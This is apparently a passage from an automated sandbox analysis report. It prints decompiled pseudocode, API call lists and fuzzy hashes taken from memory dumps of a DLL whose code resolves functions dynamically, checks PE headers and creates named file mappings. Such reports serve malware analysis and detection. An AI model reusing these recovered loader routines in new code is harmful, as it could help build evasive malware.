              						__eflags = _a4;
              						if(_a4 == 0) {
              							L15:
              							_t81 =  *0x6e1c41f8;
              							_t110 = _t76 & 0xfffff000;
              							_t58 = 0;
              							__eflags = _t81;
              							if(_t81 <= 0) {
              								L18:
              								_t104 = _t102 | 0xffffffff;
              								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
              								__eflags = _t61;
              								if(_t61 < 0) {
              									_t62 = 0;
              									__eflags = 0;
              								} else {
              									_t62 = _a4;
              								}
              								__eflags = _t62;
              								if(_t62 == 0) {
              									L59:
              									_t63 = _t104;
              									goto L60;
              								} else {
              									__eflags = _v12 - 0x1000000;
              									if(_v12 != 0x1000000) {
              										goto L59;
              									}
              									__eflags = _v16 & 0x000000cc;
              									if((_v16 & 0x000000cc) == 0) {
              										L46:
              										_t63 = 1;
              										 *0x6e1c4240 = 1;
              										__eflags =  *0x6e1c4240;
              										if( *0x6e1c4240 != 0) {
              											goto L60;
              										}
              										_t84 =  *0x6e1c41f8;
              										__eflags = _t84;
              										_t93 = _t84;
              										if(_t84 <= 0) {
              											L51:
              											__eflags = _t93;
              											if(_t93 != 0) {
              												L58:
              												 *0x6e1c4240 = 0;
              												goto L5;
              											}
              											_t77 = 0xf;
              											__eflags = _t84 - _t77;
              											if(_t84 <= _t77) {
              												_t77 = _t84;
              											}
              											_t94 = 0;
              											__eflags = _t77;
              											if(_t77 < 0) {
              												L56:
              												__eflags = _t84 - 0x10;
              												if(_t84 < 0x10) {
              													_t86 = _t84 + 1;
              													__eflags = _t86;
              													 *0x6e1c41f8 = _t86;
              												}
              												goto L58;
              											} else {
              												do {
              													_t68 = 0x6e1c4200 + _t94 * 4;
              													_t94 = _t94 + 1;
              													__eflags = _t94 - _t77;
              													 *_t68 = _t110;
              													_t110 =  *_t68;
              												} while (_t94 <= _t77);
              												goto L56;
              											}
              										}
              										_t69 = 0x6e1c41fc + _t84 * 4;
              										while(1) {
              											__eflags =  *_t69 - _t110;
              											if( *_t69 == _t110) {
              												goto L51;
              											}
              											_t93 = _t93 - 1;
              											_t69 = _t69 - 4;
              											__eflags = _t93;
              											if(_t93 > 0) {
              												continue;
              											}
              											goto L51;
              										}
              										goto L51;
              									}
              									_t87 = _v32;
              									__eflags =  *_t87 - 0x5a4d;
              									if( *_t87 != 0x5a4d) {
              										goto L59;
              									}
              									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
              									__eflags =  *_t71 - 0x4550;
              									if( *_t71 != 0x4550) {
              										goto L59;
              									}
              									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
              									if( *((short*)(_t71 + 0x18)) != 0x10b) {
              										goto L59;
              									}
              									_t78 = _t76 - _t87;
              									__eflags =  *((short*)(_t71 + 6));
              									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
              									if( *((short*)(_t71 + 6)) <= 0) {
              										goto L59;
              									}
              									_t72 =  *((intOrPtr*)(_t89 + 0xc));
              									__eflags = _t78 - _t72;
              									if(_t78 < _t72) {
              										goto L46;
              									}
              									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
              									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
              										goto L46;
              									}
              									__eflags =  *(_t89 + 0x27) & 0x00000080;
              									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
              										goto L20;
              									}
              									goto L46;
              								}
              							} else {
              								goto L16;
              							}
              							while(1) {
              								L16:
              								__eflags =  *((intOrPtr*)(0x6e1c4200 + _t58 * 4)) - _t110;
              								if( *((intOrPtr*)(0x6e1c4200 + _t58 * 4)) == _t110) {
              									break;
              								}
              								_t58 = _t58 + 1;
              								__eflags = _t58 - _t81;
              								if(_t58 < _t81) {
              									continue;
              								}
              								goto L18;
              							}
              							__eflags = _t58;
              							if(_t58 <= 0) {
              								goto L5;
              							}
              							 *0x6e1c4240 = 1;
              							__eflags =  *0x6e1c4240;
              							if( *0x6e1c4240 != 0) {
              								goto L5;
              							}
              							__eflags =  *((intOrPtr*)(0x6e1c4200 + _t58 * 4)) - _t110;
              							if( *((intOrPtr*)(0x6e1c4200 + _t58 * 4)) == _t110) {
              								L32:
              								_t100 = 0;
              								__eflags = _t58;
              								if(_t58 < 0) {
              									L34:
              									 *0x6e1c4240 = 0;
              									goto L5;
              								} else {
              									goto L33;
              								}
              								do {
              									L33:
              									_t90 = 0x6e1c4200 + _t100 * 4;
              									_t100 = _t100 + 1;
              									__eflags = _t100 - _t58;
              									 *_t90 = _t110;
              									_t110 =  *_t90;
              								} while (_t100 <= _t58);
              								goto L34;
              							}
              							_t58 = _t81 - 1;
              							__eflags = _t58;
              							if(_t58 < 0) {
              								L28:
              								__eflags = _t81 - 0x10;
              								if(_t81 < 0x10) {
              									_t81 = _t81 + 1;
              									__eflags = _t81;
              									 *0x6e1c41f8 = _t81;
              								}
              								_t58 = _t81 - 1;
              								goto L32;
              							} else {
              								goto L25;
              							}
              							while(1) {
              								L25:
              								__eflags =  *((intOrPtr*)(0x6e1c4200 + _t58 * 4)) - _t110;
              								if( *((intOrPtr*)(0x6e1c4200 + _t58 * 4)) == _t110) {
              									break;
              								}
              								_t58 = _t58 - 1;
              								__eflags = _t58;
              								if(_t58 >= 0) {
              									continue;
              								}
              								break;
              							}
              							__eflags = _t58;
              							if(__eflags >= 0) {
              								if(__eflags == 0) {
              									goto L34;
              								}
              								goto L32;
              							}
              							goto L28;
              						}
              						_t75 =  *((intOrPtr*)(_t108 - 8));
              						__eflags = _t75 - _v8;
              						if(_t75 < _v8) {
              							goto L20;
              						}
              						__eflags = _t75 - _t108;
              						if(_t75 >= _t108) {
              							goto L20;
              						}
              						goto L15;
              					}
              					L5:
              					_t63 = 1;
              					goto L60;
              				} else {
              					goto L3;
              				}
              			}

              APIs
              • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6E1C2536
              Memory Dump Source
              • Source File: 00000000.00000002.460436552.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000000.00000002.460428068.000000006E1C0000.00000002.00020000.sdmp
              • Associated: 00000000.00000002.460462599.000000006E1C3000.00000002.00020000.sdmp
              • Associated: 00000000.00000002.460478829.000000006E1C5000.00000004.00020000.sdmp
              • Associated: 00000000.00000002.460501116.000000006E1C6000.00000002.00020000.sdmp
              Similarity
              • API ID: MemoryQueryVirtual
              • String ID:
              • API String ID: 2850889275-0
              • Opcode ID: 5e3161217170060b4ce1e2be50cd83092e441f3a7d83a638fabe97ae9ce25563
              • Instruction ID: 7235fcdb4bba89b8badda73c18b7b20f7ea6bfc0909e86272b3c71de65423a49
              • Opcode Fuzzy Hash: 5e3161217170060b4ce1e2be50cd83092e441f3a7d83a638fabe97ae9ce25563
              • Instruction Fuzzy Hash: C5610670714E12CFE745CFA9D4A079A73B1ABB5F14B30A428D865C7284E73CD8C2E662
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • EnumSystemLocalesW.KERNEL32(6E22ECFF,00000001,?,6E22DC71,6E22DD0F,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6E22ED41
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: EnumLocalesSystem
              • String ID:
              • API String ID: 2099609381-0
              • Opcode ID: d2bce1483d9ed703b2eb6e88aacf787b7a858aef29b836c802b43c068c73e4d9
              • Instruction ID: a48133068195d99a27a6ac8a86a6d4250542ee6598144fba816962ccbbab43dd
              • Opcode Fuzzy Hash: d2bce1483d9ed703b2eb6e88aacf787b7a858aef29b836c802b43c068c73e4d9
              • Instruction Fuzzy Hash: 78E0927229064CAFDF019FAADC4AB6D3BA6BB09711F009411F61C4A150C6B1A960EF64
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetLocaleInfoW.KERNEL32(00000000,?,00000002,?,?,6E223D76,?,?,?,00000002,?,00000000,00000000), ref: 6E22EDC0
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: InfoLocale
              • String ID:
              • API String ID: 2299586839-0
              • Opcode ID: 6d0845e281bed74c1cf47075afa685b275dc75d706512c1578865d59e1cbe361
              • Instruction ID: ec615d8938a14c894d2c125b96b20b773e59bc9cd0696c724c34a36dd99893a2
              • Opcode Fuzzy Hash: 6d0845e281bed74c1cf47075afa685b275dc75d706512c1578865d59e1cbe361
              • Instruction Fuzzy Hash: A5D0173600410DBF9F029FE4EC098AE3BAAFB49224B000810F91845010D632A460EB60
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 6E225EA7
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0
              • Opcode ID: 06299542c29e121a760e0d88010e323fc62024f557ba27dc40b6f6271d670955
              • Instruction ID: 7e600832d0f0c51b65722c059d5b8189a9339ac77f7b899ebd07a7cbf992b62c
              • Opcode Fuzzy Hash: 06299542c29e121a760e0d88010e323fc62024f557ba27dc40b6f6271d670955
              • Instruction Fuzzy Hash: B0A0243000010CF7CF001F4DDC0D44C7F1DD7035507004010F40C04011C7335411C5D0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetProcessHeap.KERNEL32(6E21C958,6E293798,00000008,6E294008,6E29354C,?,00000001), ref: 6E225139
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: HeapProcess
              • String ID:
              • API String ID: 54951025-0
              • Opcode ID: af4c230d978515669ec482fbe099bf311523377186a6ee401d6dac2e9fd6c0da
              • Instruction ID: 1630e05ac401ca38046f3abd821baef4388a481d0b25e60aaa6a9208016b6576
              • Opcode Fuzzy Hash: af4c230d978515669ec482fbe099bf311523377186a6ee401d6dac2e9fd6c0da
              • Instruction Fuzzy Hash: 5CB012B0307D02477F080B3D545D00D35D5770D202314003D7003C5140EF20C450DE24
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 13ae554fede668713c8418b731cea2a7546aabb52c717da24dcf4f4522932379
              • Instruction ID: 8c7fa241a88ef3beb5953e970c7dc3d599bf3b26f48804e8d4671339ece989ae
              • Opcode Fuzzy Hash: 13ae554fede668713c8418b731cea2a7546aabb52c717da24dcf4f4522932379
              • Instruction Fuzzy Hash: 16615FB1E0062A8BDB19CF5EC890159FBF6BFC5300729C16AD859DB715E670D942CF90
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 71%
              			E6E1C2264(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
              				intOrPtr _v8;
              				char _v12;
              				void* __ebp;
              				signed int* _t43;
              				char _t44;
              				void* _t46;
              				void* _t49;
              				intOrPtr* _t53;
              				void* _t54;
              				void* _t65;
              				long _t66;
              				signed int* _t80;
              				signed int* _t82;
              				void* _t84;
              				signed int _t86;
              				void* _t89;
              				void* _t95;
              				void* _t96;
              				void* _t99;
              				void* _t106;
              
              				_t43 = _t84;
              				_t65 = __ebx + 2;
              				 *_t43 =  *_t43 ^ __edx ^  *__eax;
              				_t89 = _t95;
              				_t96 = _t95 - 8;
              				_push(_t65);
              				_push(_t84);
              				_push(_t89);
              				asm("cld");
              				_t66 = _a8;
              				_t44 = _a4;
              				if(( *(_t44 + 4) & 0x00000006) != 0) {
              					_push(_t89);
              					E6E1C23CB(_t66 + 0x10, _t66, 0xffffffff);
              					_t46 = 1;
              				} else {
              					_v12 = _t44;
              					_v8 = _a12;
              					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
              					_t86 =  *(_t66 + 0xc);
              					_t80 =  *(_t66 + 8);
              					_t49 = E6E1C2485(_t66);
              					_t99 = _t96 + 4;
              					if(_t49 == 0) {
              						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
              						goto L11;
              					} else {
              						while(_t86 != 0xffffffff) {
              							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
              							if(_t53 == 0) {
              								L8:
              								_t80 =  *(_t66 + 8);
              								_t86 = _t80[_t86 + _t86 * 2];
              								continue;
              							} else {
              								_t54 =  *_t53();
              								_t89 = _t89;
              								_t86 = _t86;
              								_t66 = _a8;
              								_t55 = _t54;
              								_t106 = _t54;
              								if(_t106 == 0) {
              									goto L8;
              								} else {
              									if(_t106 < 0) {
              										_t46 = 0;
              									} else {
              										_t82 =  *(_t66 + 8);
              										E6E1C2370(_t55, _t66);
              										_t89 = _t66 + 0x10;
              										E6E1C23CB(_t89, _t66, 0);
              										_t99 = _t99 + 0xc;
              										E6E1C2467(_t82[2]);
              										 *(_t66 + 0xc) =  *_t82;
              										_t66 = 0;
              										_t86 = 0;
              										 *(_t82[2])(1);
              										goto L8;
              									}
              								}
              							}
              							goto L13;
              						}
              						L11:
              						_t46 = 1;
              					}
              				}
              				L13:
              				return _t46;
              			}

              Memory Dump Source
              • Source File: 00000000.00000002.460436552.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000000.00000002.460428068.000000006E1C0000.00000002.00020000.sdmp
              • Associated: 00000000.00000002.460462599.000000006E1C3000.00000002.00020000.sdmp
              • Associated: 00000000.00000002.460478829.000000006E1C5000.00000004.00020000.sdmp
              • Associated: 00000000.00000002.460501116.000000006E1C6000.00000002.00020000.sdmp
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
              • Instruction ID: fc4c44353901f2d84307cfb61ba1084ea3174adebfb3bedd7e8f94923ebf324b
              • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
              • Instruction Fuzzy Hash: B521F832900605DFCB00DFA8C8C09ABB7A9FF5D710B46A568D815CB245DB34F956C7E1
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.461300505.000000006E296000.00000040.00020000.sdmp, Offset: 6E296000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
              • Instruction ID: f5e0c9210ea3bc322c41457297fdc8de1cb85b81498ae20c17ec85757308bd18
              • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
              • Instruction Fuzzy Hash: F511E6733501059FD754CE9ADCD0E92B3DAEB89230B258066ED14CB315E776E801C7A0
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.461300505.000000006E296000.00000040.00020000.sdmp, Offset: 6E296000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
              • Instruction ID: 1ca1594a6c9d34dfbfef0065e495939f7c8eb7d6fd8824ac6405c0f8d13dbf9c
              • Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
              • Instruction Fuzzy Hash: 3A01F53231420A8FD745CBAED894D69BBE5EBC1721B19D07EC446C7655D120E445CA20
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RtlDecodePointer.NTDLL(?), ref: 6E2235A7
              • _free.LIBCMT ref: 6E2235C0
                • Part of subcall function 6E223DA6: HeapFree.KERNEL32(00000000,00000000,?,6E22206D,00000000,00000001,00000000,?,?,?,6E21D916,6E21B7A5), ref: 6E223DBA
                • Part of subcall function 6E223DA6: GetLastError.KERNEL32(00000000,?,6E22206D,00000000,00000001,00000000,?,?,?,6E21D916,6E21B7A5), ref: 6E223DCC
              • _free.LIBCMT ref: 6E2235D3
              • _free.LIBCMT ref: 6E2235F1
              • _free.LIBCMT ref: 6E223603
              • _free.LIBCMT ref: 6E223614
              • _free.LIBCMT ref: 6E22361F
              • _free.LIBCMT ref: 6E223643
              • RtlEncodePointer.NTDLL(6E295980), ref: 6E22364A
              • _free.LIBCMT ref: 6E22365F
              • _free.LIBCMT ref: 6E223675
              • _free.LIBCMT ref: 6E22369D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
              • String ID: F)n
              • API String ID: 3064303923-455955172
              • Opcode ID: b351bee342eaa5ea5cf40aa6b6976d5ef99be533ffdf976dcf5212443e0daf59
              • Instruction ID: f2092f26939f6fe976f8b0e4216b1d686dbad9eae048902615ada0eeb8d0289f
              • Opcode Fuzzy Hash: b351bee342eaa5ea5cf40aa6b6976d5ef99be533ffdf976dcf5212443e0daf59
              • Instruction Fuzzy Hash: 4221A039A4692BCFFFA04FA6DD4C96977ABBB46736300153AE51897300C7384841CAF0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
              • String ID:
              • API String ID: 1442030790-0
              • Opcode ID: 5f1bf0b6b12f42165af58525b084f009b1f80eeb4bf0aaef3849c797b4d487a4
              • Instruction ID: 58fce7c5e625cfd19c7794b453747821f3fc3bb7f5cd63cc94dbe1269efbc1a9
              • Opcode Fuzzy Hash: 5f1bf0b6b12f42165af58525b084f009b1f80eeb4bf0aaef3849c797b4d487a4
              • Instruction Fuzzy Hash: E521C27F52861AEFE7615FE5CC05E8A7BEBFF46754B204C39E44456260EB3384008690
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
              • String ID:
              • API String ID: 3432600739-0
              • Opcode ID: 1a8b89061ca08546a97338d745b169eb0ad3987c8d74a91615036877f3643dcd
              • Instruction ID: 4a74aaa7999ea2dfe95c970c909eeb090bc5f55156b2ac6bfb2ceaba66c413d7
              • Opcode Fuzzy Hash: 1a8b89061ca08546a97338d745b169eb0ad3987c8d74a91615036877f3643dcd
              • Instruction Fuzzy Hash: 2D41EEBA81420EAFDB009FE59880BCD77EBBF04319F104839F91597180DB779686DB61
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 68%
              			E6E1C1144(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
              				intOrPtr _v12;
              				struct _FILETIME* _v16;
              				short _v60;
              				struct _FILETIME* _t14;
              				intOrPtr _t15;
              				long _t18;
              				void* _t22;
              				intOrPtr _t31;
              				long _t32;
              				void* _t34;
              
              				_t31 = __edx;
              				_t14 =  &_v16;
              				GetSystemTimeAsFileTime(_t14);
              				_push(0x192);
              				_push(0x54d38000);
              				_push(_v12);
              				_push(_v16);
              				L6E1C2210();
              				_push(_t14);
              				_v16 = _t14;
              				_t15 =  *0x6e1c41d0;
              				_push(_t15 + 0x6e1c505e);
              				_push(_t15 + 0x6e1c5054);
              				_push(0x16);
              				_push( &_v60);
              				_v12 = _t31;
              				L6E1C220A();
              				_t18 = _a4;
              				if(_t18 == 0) {
              					_t18 = 0x1000;
              				}
              				_t34 = CreateFileMappingW(0xffffffff, 0x6e1c41c0, 4, 0, _t18,  &_v60);
              				if(_t34 == 0) {
              					_t32 = GetLastError();
              				} else {
              					if(_a4 != 0 || GetLastError() == 0xb7) {
              						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
              						if(_t22 == 0) {
              							_t32 = GetLastError();
              							if(_t32 != 0) {
              								goto L9;
              							}
              						} else {
              							 *_a8 = _t34;
              							 *_a12 = _t22;
              							_t32 = 0;
              						}
              					} else {
              						_t32 = 2;
              						L9:
              						CloseHandle(_t34);
              					}
              				}
              				return _t32;
              			}

              APIs
              • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6E1C156A,0000000A,?,?), ref: 6E1C1151
              • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E1C1167
              • _snwprintf.NTDLL ref: 6E1C118C
              • CreateFileMappingW.KERNEL32(000000FF,6E1C41C0,00000004,00000000,?,?), ref: 6E1C11B1
              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1C156A,0000000A,?), ref: 6E1C11C8
              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 6E1C11DC
              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1C156A,0000000A,?), ref: 6E1C11F4
              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E1C156A,0000000A), ref: 6E1C11FD
              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1C156A,0000000A,?), ref: 6E1C1205
              Memory Dump Source
              • Source File: 00000000.00000002.460436552.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000000.00000002.460428068.000000006E1C0000.00000002.00020000.sdmp
              • Associated: 00000000.00000002.460462599.000000006E1C3000.00000002.00020000.sdmp
              • Associated: 00000000.00000002.460478829.000000006E1C5000.00000004.00020000.sdmp
              • Associated: 00000000.00000002.460501116.000000006E1C6000.00000002.00020000.sdmp
              Similarity
              • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
              • String ID:
              • API String ID: 1724014008-0
              • Opcode ID: c60262e967d796770997ba4527c8b51bef56c7ab98e41e8c78b434eff493d3c0
              • Instruction ID: 803b6c2780bf403bb96ebac22d9f8b35b69169cd61ce97a2e769f5d4ec081a58
              • Opcode Fuzzy Hash: c60262e967d796770997ba4527c8b51bef56c7ab98e41e8c78b434eff493d3c0
              • Instruction Fuzzy Hash: 0421D672640108BFDB01AFE8CC88EDE7BB9EB65B50F214165F915E7140D63C5C85EB62
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • __init_pointers.LIBCMT ref: 6E22212F
                • Part of subcall function 6E2237EA: RtlEncodePointer.NTDLL(00000000), ref: 6E2237ED
                • Part of subcall function 6E2237EA: __initp_misc_winsig.LIBCMT ref: 6E223808
                • Part of subcall function 6E2237EA: GetModuleHandleW.KERNEL32(6E1C30D8,?,6E293798,00000008,6E294008,6E29354C,?,00000001), ref: 6E225B99
              • __mtinitlocks.LIBCMT ref: 6E222134
              • __mtterm.LIBCMT ref: 6E22213D
                • Part of subcall function 6E2221A5: RtlDeleteCriticalSection.NTDLL(?), ref: 6E228218
                • Part of subcall function 6E2221A5: _free.LIBCMT ref: 6E22821F
                • Part of subcall function 6E2221A5: RtlDeleteCriticalSection.NTDLL(6E294D40), ref: 6E228241
              • __calloc_crt.LIBCMT ref: 6E222162
              • __initptd.LIBCMT ref: 6E222184
              • GetCurrentThreadId.KERNEL32 ref: 6E22218B
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
              • String ID:
              • API String ID: 1551663144-0
              • Opcode ID: 3b49f610130fdca1db4e76172ce1afc97b02853db3e76f9baa70e81cbd1daa23
              • Instruction ID: d565c042dde21decc911553a71a6fc81b6dc8b151065f299e509da5fd8bd05a5
              • Opcode Fuzzy Hash: 3b49f610130fdca1db4e76172ce1afc97b02853db3e76f9baa70e81cbd1daa23
              • Instruction Fuzzy Hash: F0F0F67702D71B2FF664AAF46C05ACB2A8BAF02639B200A39F564DA0D1FF128041D160
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6E1C1060(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
              				intOrPtr _v8;
              				_Unknown_base(*)()* _t29;
              				_Unknown_base(*)()* _t33;
              				_Unknown_base(*)()* _t36;
              				_Unknown_base(*)()* _t39;
              				_Unknown_base(*)()* _t42;
              				intOrPtr _t46;
              				struct HINSTANCE__* _t50;
              				intOrPtr _t56;
              
              				_t56 = E6E1C1B58(0x20);
              				if(_t56 == 0) {
              					_v8 = 8;
              				} else {
              					_t50 = GetModuleHandleA( *0x6e1c41d0 + 0x6e1c5014);
              					_v8 = 0x7f;
              					_t29 = GetProcAddress(_t50,  *0x6e1c41d0 + 0x6e1c50e1);
              					 *(_t56 + 0xc) = _t29;
              					if(_t29 == 0) {
              						L8:
              						E6E1C142F(_t56);
              					} else {
              						_t33 = GetProcAddress(_t50,  *0x6e1c41d0 + 0x6e1c50f1);
              						 *(_t56 + 0x10) = _t33;
              						if(_t33 == 0) {
              							goto L8;
              						} else {
              							_t36 = GetProcAddress(_t50,  *0x6e1c41d0 + 0x6e1c5104);
              							 *(_t56 + 0x14) = _t36;
              							if(_t36 == 0) {
              								goto L8;
              							} else {
              								_t39 = GetProcAddress(_t50,  *0x6e1c41d0 + 0x6e1c5119);
              								 *(_t56 + 0x18) = _t39;
              								if(_t39 == 0) {
              									goto L8;
              								} else {
              									_t42 = GetProcAddress(_t50,  *0x6e1c41d0 + 0x6e1c512f);
              									 *(_t56 + 0x1c) = _t42;
              									if(_t42 == 0) {
              										goto L8;
              									} else {
              										 *((intOrPtr*)(_t56 + 8)) = _a8;
              										 *((intOrPtr*)(_t56 + 4)) = _a4;
              										_t46 = E6E1C1B9C(_t56, _a12);
              										_v8 = _t46;
              										if(_t46 != 0) {
              											goto L8;
              										} else {
              											 *_a16 = _t56;
              										}
              									}
              								}
              							}
              						}
              					}
              				}
              				return _v8;
              			}

              APIs
                • Part of subcall function 6E1C1B58: HeapAlloc.KERNEL32(00000000,?,6E1C1702,?,00000000,00000000,?,?,?,6E1C1CE6), ref: 6E1C1B64
              • GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6E1C1480,?,?,?,?,00000002,00000000,?,?), ref: 6E1C1084
              • GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10A6
              • GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10BC
              • GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10D2
              • GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10E8
              • GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10FE
                • Part of subcall function 6E1C1B9C: memset.NTDLL ref: 6E1C1C1B
              Memory Dump Source
              • Source File: 00000000.00000002.460436552.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000000.00000002.460428068.000000006E1C0000.00000002.00020000.sdmp
              • Associated: 00000000.00000002.460462599.000000006E1C3000.00000002.00020000.sdmp
              • Associated: 00000000.00000002.460478829.000000006E1C5000.00000004.00020000.sdmp
              • Associated: 00000000.00000002.460501116.000000006E1C6000.00000002.00020000.sdmp
              Similarity
              • API ID: AddressProc$AllocHandleHeapModulememset
              • String ID:
              • API String ID: 426539879-0
              • Opcode ID: 6c491f257b895694d05b118b3e60ec4a510c9f5036a9515af6d925cca7394367
              • Instruction ID: c55f6172b4d60dac4960483c3967355f82887751ae68e4afe54efec6a1ecb65d
              • Opcode Fuzzy Hash: 6c491f257b895694d05b118b3e60ec4a510c9f5036a9515af6d925cca7394367
              • Instruction Fuzzy Hash: B021A5F160060B9FDB40EFA9DC84D5A7BFCFB65E44B104415E989D7201E33CE906AB61
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • FindFirstChangeNotificationA.KERNEL32 ref: 6E23EB7D
              • GetCurrentDirectoryA.KERNEL32(00000404,6E2A9BC0), ref: 6E23EBDF
              • GetEnvironmentVariableA.KERNEL32(6E1C8140,6E2AA1E8,00000404), ref: 6E23ECD9
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: ChangeCurrentDirectoryEnvironmentFindFirstNotificationVariable
              • String ID: 3$PR)n
              • API String ID: 2016254915-1293188012
              • Opcode ID: 6434ee782b76773d494697785d01e23527eadc4414a76b44a4d68fde20b57dc6
              • Instruction ID: f6d5d697a6d37fcb63d56ea0a24ecb194e354d0057a3c764feded77284319f67
              • Opcode Fuzzy Hash: 6434ee782b76773d494697785d01e23527eadc4414a76b44a4d68fde20b57dc6
              • Instruction Fuzzy Hash: D471AEB1B847168FDB04CFAAC89861977A3FB8631AF549A3ED81587344D3749808CF61
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: _wcsnlen
              • String ID: U
              • API String ID: 3628947076-3372436214
